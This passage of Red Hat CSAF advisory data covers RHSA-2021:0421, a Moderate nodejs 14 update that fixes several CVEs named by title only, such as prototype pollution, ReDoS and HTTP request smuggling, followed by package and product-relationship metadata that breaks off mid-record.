"AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: HTTP request smuggling via two copies of a header field in an http request" } ] }
rhsa-2021_0421
Vulnerability from csaf_redhat
Published
2021-02-04 17:20
Modified
2024-11-15 09:38
Summary
Red Hat Security Advisory: rh-nodejs14-nodejs security update
Notes
Topic
An update for rh-nodejs14-nodejs is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: rh-nodejs14-nodejs (14.15.4).
Security Fix(es):
* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)
* c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS (CVE-2020-8277)
* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)
* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for rh-nodejs14-nodejs is now available for Red Hat Software Collections.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: rh-nodejs14-nodejs (14.15.4).\n\nSecurity Fix(es):\n\n* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)\n\n* c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS (CVE-2020-8277)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)\n\n* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0421", "url": "https://access.redhat.com/errata/RHSA-2021:0421" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "1898554", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898554" }, { "category": "external", "summary": "1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0421.json" } ], "title": "Red Hat Security Advisory: rh-nodejs14-nodejs security update", "tracking": { "current_release_date": "2024-11-15T09:38:32+00:00", "generator": { "date": "2024-11-15T09:38:32+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:0421", "initial_release_date": "2021-02-04T17:20:51+00:00", "revision_history": [ { "date": "2021-02-04T17:20:51+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-04T17:20:51+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T09:38:32+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } } ], "category": "product_family", "name": "Red Hat Software Collections" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "product": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "product_id": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2.el7?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "product": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "product_id": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "product": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "product_id": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-devel@14.15.4-2.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "product": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "product_id": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-npm@6.14.10-14.15.4.2.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "product": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "product_id": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-debuginfo@14.15.4-2.el7?arch=x86_64" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "product": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "product_id": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "product": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "product_id": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-devel@14.15.4-2.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "product": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "product_id": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-npm@6.14.10-14.15.4.2.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "product": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "product_id": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-debuginfo@14.15.4-2.el7?arch=s390x" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "product": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "product_id": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "product": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "product_id": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-devel@14.15.4-2.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "product": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "product_id": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-npm@6.14.10-14.15.4.2.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "product": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "product_id": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-debuginfo@14.15.4-2.el7?arch=ppc64le" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "product": { "name": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "product_id": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs14-nodejs-docs@14.15.4-2.el7?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { 